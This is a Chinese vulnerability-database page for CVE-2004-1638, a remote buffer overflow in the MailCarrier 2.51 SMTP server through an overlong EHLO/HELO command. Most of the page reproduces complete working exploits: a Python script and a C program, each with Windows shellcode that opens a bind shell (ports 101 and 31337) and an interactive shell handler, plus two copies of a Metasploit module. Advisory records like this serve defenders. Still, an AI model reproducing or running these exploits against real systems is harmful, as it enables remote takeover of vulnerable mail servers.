CVE-2004-1638
CVSS7.5
发布时间 :2004-10-16 00:00:00
修订时间 :2016-10-17 22:58:10
NMCOEP    

[原文]Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.


[CNNVD]MailCarrier SMTP服务程序远程缓冲区溢出漏洞(CNNVD-200410-022)

        
        MailCarrier SMTP server是一款功能强大的SMTP服务程序。
        MailCarrier SMTP server对EHLO/HELO命令处理不正确,远程攻击者可以利用这个漏洞对服务进程进行缓冲区溢出,可能以进程权限执行任意指令。
        提交包含超长参数的EHLO/HELO命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1638
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1638
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-022
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109880961630050&w=2
(UNKNOWN)  BUGTRAQ  20041026 MailCarrier 2.51 SMTP server Buffer Overflow [PoC included]
http://www.securityfocus.com/bid/11535
(VENDOR_ADVISORY)  BID  11535
http://xforce.iss.net/xforce/xfdb/17861
(VENDOR_ADVISORY)  XF  mailcarrier-ehlo-helo-bo(17861)

- 漏洞信息

MailCarrier SMTP服务程序远程缓冲区溢出漏洞
高危 边界条件错误
2004-10-16 00:00:00 2005-10-20 00:00:00
远程  
        
        MailCarrier SMTP server是一款功能强大的SMTP服务程序。
        MailCarrier SMTP server对EHLO/HELO命令处理不正确,远程攻击者可以利用这个漏洞对服务进程进行缓冲区溢出,可能以进程权限执行任意指令。
        提交包含超长参数的EHLO/HELO命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        TABS LABORATORIES
        -----------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.tabslab.com/en/product/mailcarrier20/

- 漏洞信息 (598)

MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit (EDBID:598)
windows remote
2004-10-26 Verified
25 muts
[点击下载] [点击下载]
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow 	#
# Advanced, secure and easy to use FTP Server. 	    	#
# 23 Oct 2004 - muts                                	#
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py                       	#
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101			#
# localhost [127.0.0.1] 101 (hostname) open		#
# Microsoft Windows 2000 [Version 5.00.2195]		#
# (C) Copyright 1985-2000 Microsoft Corp.		#
# C:\WINNT\system32>					#
#########################################################

import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n" 
print "\n\n###############################################"

def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"

# Change RET address as need be.

#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2  #RET WinXP SP2 ENG

try:
	print "\nSending evil buffer..."
	s.connect(('127.0.0.1',25))
	s.send('EHLO ' + buffer + '\r\n')
	data = s.recv(1024)
	s.close()
	print "\nDone! Try connecting to port 101 on victim machine."
except:
	print "Could not connect to SMTP!"

# milw0rm.com [2004-10-26]
		

- 漏洞信息 (637)

MailCarrier 2.51 Remote Buffer Overflow Exploit (EDBID:637)
windows remote
2004-11-16 Verified
25 NoPh0BiA
N/A [点击下载]
/* Remote exploit for MailCarrier by NoPh0BiA,

no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/

char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81"
"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x81\x0a\x12\x1b"
"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x80\xb3\xcc\x07"
"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x80\xb7\x76\xb2"
"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x46\xb2\xb5\x76"
"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x8d\x12\xcc\x17"
"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\xde\x07\x1a\x16"
"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x8d\xd2\x1c\x51"
"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x57\xd0\x80\xcc"
"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x81\x59\x47\xdd"
"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\xc8\xdf\x0e\xe9"
"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x6c\xa5\x7c\x1a"
"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x56\xd0\x98\xc4"
"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x7e\x0c\x43\x14"
"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\xb1\x68\x87\x1d"
"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\xb0\x82\x14\x1e"
"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\xd4\x7d\x14\x1a"
"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\xc2\x14\x03\x4d"
"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\xd8\xaa\xec\xca"
"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\xa5\x65\x46\x4c"
"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x0c\x1d\x63\x5d"
"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x7e\x2c\x47\x25"
"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\xf4\x59\x2f\xe0"
"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x7e\x8a\xb8\x38"
"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x7e\x89\x47";


struct sockaddr_in hrm,lar;

void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;
 
 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);
 
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
 
  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }
 
  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}
int conn(char *ip,int port)
{
	int sockfd;
	hrm.sin_family = AF_INET;
	hrm.sin_port = htons(port);
	hrm.sin_addr.s_addr = inet_addr(ip);
	bzero(&(hrm.sin_zero),8);
	sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
	{
	perror("connect");
	exit(0);
	}
	printf("[x] Connected to: %s PORT: %d\n",ip,port);
	return sockfd;
}

int main(int argc, char *argv[])
{
	char *buffer = malloc(5530),*crap = malloc(32),*t;
	int x,y;
	if(argc<2)
	{
	printf("Usage: TargetIP.\n");
	exit(0);
	}
	printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
	t=argv[1];
	memset(buffer,'\0',5530);
	memset(crap,0x41,32);
	memset(buffer,0x90,5095);
	strcat(buffer,RET);
	strcat(buffer,crap);
	strcat(buffer,shellcode);
	x = conn(t,PORT);
	printf("[x] Sending evil buffer..");
	sleep(3);
	write(x,"EHLO ",5);
	sleep(1);
	write(x,buffer,5530);
	write(x,"\r\n\r\n",4);
	sleep(2);
	close(x);
	printf("done.\n");
	printf("[x] Trying to connect to port 31337..\n");
	y = conn(t,RPORT);
	printf("[x] 0wn3d!\n");
	printf("\r\n");
	shell(y);
		
}

// milw0rm.com [2004-11-16]
		

- 漏洞信息 (16822)

TABS MailCarrier v2.51 SMTP EHLO Overflow (EDBID:16822)
windows remote
2010-04-30 Verified
25 metasploit
N/A [点击下载]
##
# $Id: mailcarrier_smtp_ehlo.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
			'Description'	=> %q{
					This module exploits the MailCarrier v2.51 suite SMTP service.
				The stack is overwritten when sending an overly long EHLO command.
			},
			'Author' 	    => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9179 $',
			'References'    =>
			[
				[ 'CVE', '2004-1638' ],
				[ 'OSVDB', '11174' ],
				[ 'BID', '11535' ],
				[ 'URL', 'http://milw0rm.com/exploits/598' ],
			],
			'Platform'      => ['win'],
			'Arch'		    => [ ARCH_X86 ],
			'Privileged'		=> true,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload' =>
				{
					'Space'			=> 300,
					'BadChars' 		=> "\x00\x0a\x0d:",
					'StackAdjustment'	=> -3500,
				},
			'Targets' =>
				[
					# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
					[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1
					[ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
				],
			'DisclosureDate' => 'Oct 26 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(25),
				Opt::LHOST(), # Required for stack offset
			], self.class)
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /ESMTP TABS Mail Server for Windows NT/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
		sploit << [target['Ret']].pack('V') + payload.encoded

		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83004)

TABS MailCarrier v2.51 SMTP EHLO Overflow (PacketStormID:F83004)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit
CVE-2004-1638
[点击下载]

This Metasploit module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
			'Description'	=> %q{
            		This module exploits the MailCarrier v2.51 suite SMTP service.
			The stack is overwritten when sending an overly long EHLO command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2004-1638' ],
				[ 'OSVDB', '11174' ],
				[ 'BID', '11535' ],
				[ 'URL', 'http://milw0rm.com/exploits/598' ],
			],         
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'			=> 300,
					'BadChars' 		=> "\x00\x0a\x0d:",
					'StackAdjustment'	=> -3500,
				},
			'Platform' => ['win'],
			'Targets' =>
			[
				# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
				[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1
				[ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
			],
			'DisclosureDate' => 'Oct 26 2004',
			'DefaultTarget' => 0))
            
			register_options(
			[
				Opt::RPORT(25),
				Opt::LHOST(), # Required for stack offset
			], self.class)
	end

	def check 
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /ESMTP TABS Mail Server for Windows NT/)
			return Exploit::CheckCode::Appears 
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
		sploit << [target['Ret']].pack('V') + payload.encoded
		
		sock.put(sploit + "\r\n")
		
		handler
		disconnect
	end

end
    

- 漏洞信息

11174
MailCarrier HELO/EHLO Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

A remote overflow exists in MailCarrier. The server fails to properly check bounds on HELO and EHLO commands, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code with the privileges of the running daemon.

- 时间线

2004-10-26 Unknow
2004-10-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站